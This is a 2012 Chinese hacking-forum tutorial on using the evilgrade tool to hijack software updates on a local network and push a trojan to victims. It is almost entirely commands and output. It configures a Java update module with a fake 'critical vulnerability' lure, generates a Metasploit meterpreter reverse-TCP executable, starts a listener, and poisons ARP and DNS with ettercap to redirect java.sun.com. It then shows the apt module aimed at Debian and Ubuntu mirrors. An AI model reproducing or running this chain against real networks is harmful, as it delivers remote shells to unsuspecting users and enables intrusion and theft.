切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
52 : 中间人攻击 evilgrade[复制链接]
发表于 2012-8-21 00:58:37 | 显示全部楼层 |!read_mode!
evilgrade是一个中间人劫持工具,作用:伪造软件更新 插入木马!
安装 打开UB1 下载


  1. root@Dis9Team:/pen# wget http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz
复制代码
他是PERL写的 安装支持:


  1. root@Dis9Team:/pen# cpan Data::Dump
  2. root@Dis9Team:/pen# cpan Digest::MD5 Time::HiRes
  3. root@Dis9Team:/pen# sudo apt-get install libio-socket-ssl-perl
复制代码


卡的话用代理
解压缩


  1. root@Dis9Team:/pen# tar xf isr-evilgrade-2.0.0.tar.gz
复制代码



运行:


  1. root@Dis9Team:/pen/isr-evilgrade# ./evilgrade
复制代码
查看支持的模块:


  1. evilgrade>show modules

  2. List of modules:
  3. ===============

  4. allmynotes
  5. amsn
  6. appleupdate
  7. apptapp
  8. apt
  9. atube
  10. autoit3
  11. bbappworld
  12. blackberry
  13. bsplayer
  14. ccleaner
  15. clamwin
  16. cpan
  17. cygwin
  18. dap
  19. divxsuite
  20. express_talk
  21. fcleaner
  22. filezilla
  23. flashget
  24. flip4mac
  25. freerip
  26. getjar
  27. gom
  28. googleanalytics
  29. growl
  30. isopen
  31. istat
  32. itunes
  33. jet
  34. jetphoto
  35. linkedin
  36. miranda
  37. mirc
  38. nokia
  39. nokiasoftware
  40. notepadplus
  41. openoffice
  42. opera
  43. orbit
  44. osx
  45. paintnet
  46. panda_antirootkit
  47. photoscape
  48. quicktime
  49. skype
  50. sparkle
  51. speedbit
  52. sunbelt
  53. sunjava
  54. superantispyware
  55. teamviewer
  56. techtracker
  57. trillian
  58. ubertwitter
  59. vidbox
  60. virtualbox
  61. vmware
  62. winamp
  63. winscp
  64. winupdate
  65. winzip
  66. yahoomsn
  67. - 63 modules available.


  68. evilgrade>
复制代码


JAVA更新做测试


  1. evilgrade>configure sunjava  //进入模块
  2. evilgrade(sunjava)>show options  //查看配置

  3. Display options:
  4. ===============

  5. Name = Sun Microsystems Java
  6. Version = 1.0
  7. Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
  8. Description = ""
  9. VirtualHost = "(java.sun.com|javadl-esd.sun.com)"

  10. .-------------------------------------------------------------------------------------------------------------------------.
  11. | Name         | Default                                         | Description                                            |
  12. +--------------+-------------------------------------------------+--------------------------------------------------------+
  13. | website      | http://java.com/moreinfolink                    | Website displayed in the update                        |
  14. | enable       |                                               1 | Status                                                 |
  15. | atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |
  16. | arg          | http://java.sun.com/x.jnlp"                     | Arg passed to Agent                                    |
  17. | adescription | This critical update fix internal vulnerability | Description  to be displayed in the systray item popup |
  18. | description  | This critical update fix internal vulnerability | Description to be displayed during the update          |
  19. | agent        | ./include/sunjava/JavaPayload/FunnyClass2.jar   | Agent to inject                                        |
  20. | title        | Critical update                                 | Title name displayed in the update                     |
  21. '--------------+-------------------------------------------------+--------------------------------------------------------'

  22. evilgrade(sunjava)>
复制代码
然后我们写入一个木马:
  1. evilgrade(sunjava)>set agent /tmp/exe.exe
  2. set agent, /tmp/exe.exe
  3. evilgrade(sunjava)>
复制代码



生成木马并且监听:


  1. msf  payload(reverse_tcp) > generate -t exe -f /tmp/exe.exe
  2. [*] Writing 73802 bytes to /tmp/exe.exe...
  3. msf  payload(reverse_tcp) > use exploit/multi/handler
  4. msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  5. PAYLOAD => windows/meterpreter/reverse_tcp
  6. msf  exploit(handler) > set LHOST 192.168.40.128
  7. LHOST => 192.168.40.128
  8. msf  exploit(handler) > exploit

  9. [*] Started reverse handler on 192.168.40.128:4444
  10. [*] Starting the payload handler...
复制代码



对模块参数的VirtualHost 进行DNS欺骗
VirtualHost = “(java.sun.com|javadl-esd.sun.com)”

  1. root@Dis9Team:/pen/isr-evilgrade# cd /usr/share/ettercap/
  2. root@Dis9Team:/usr/share/ettercap# rm etter.dns
  3. root@Dis9Team:/usr/share/ettercap# nano etter.dns
  4. root@Dis9Team:/usr/share/ettercap# cat etter.dns
  5. java.sun.com A 192.168.40.128
  6. javadl-esd.sun.com A 192.168.40.128
  7. root@Dis9Team:/usr/share/ettercap# ettercap -T -q -P dns_spoof -M arp // //
复制代码



启动evilgrade


  1. evilgrade(sunjava)>start
复制代码



当我们更新的JAVA的时候,他会自动劫持数据插入我们的木马. 但是很多东西版本都太低级了 成功几率不大 你了解他的运作原理就行
视频:


成功率大点的是apt


  1. evilgrade(apt)>show options  

  2. Display options:
  3. ===============

  4. Name = apt
  5. Version = 1.1
  6. Author = ["Leandro Costantino < lcostantino +[AT]+ gmail.com>"]
  7. Description = ""
  8. VirtualHost = "(ftp.br.debian.org|ar.archive.ubuntu.com|security.ubuntu.com|archive.ubuntu.com|security.debian.org)"

  9. .--------------------------------------------------------------------------------------------------.
  10. | Name        | Default                                                          | Description     |
  11. +-------------+------------------------------------------------------------------+-----------------+
  12. | enable      |                                                                1 | Status          |
  13. | agentmd5    | 5444df6af0d0928f83de977f55d523e8                                 |                 |
  14. | agentsize   |                                                             2012 |                 |
  15. | agent       | ./agent/debian/seed-debian_0.3_all.deb                           | Agent to inject |
  16. | agentsha256 | 4b901a25dc73e41fdb9aef29241b53cec5065796c63a733b99d5539c7d6439d4 |                 |
  17. '-------------+------------------------------------------------------------------+-----------------'

  18. evilgrade(apt)>
复制代码




不过你得晓得他的APT源

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 06:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部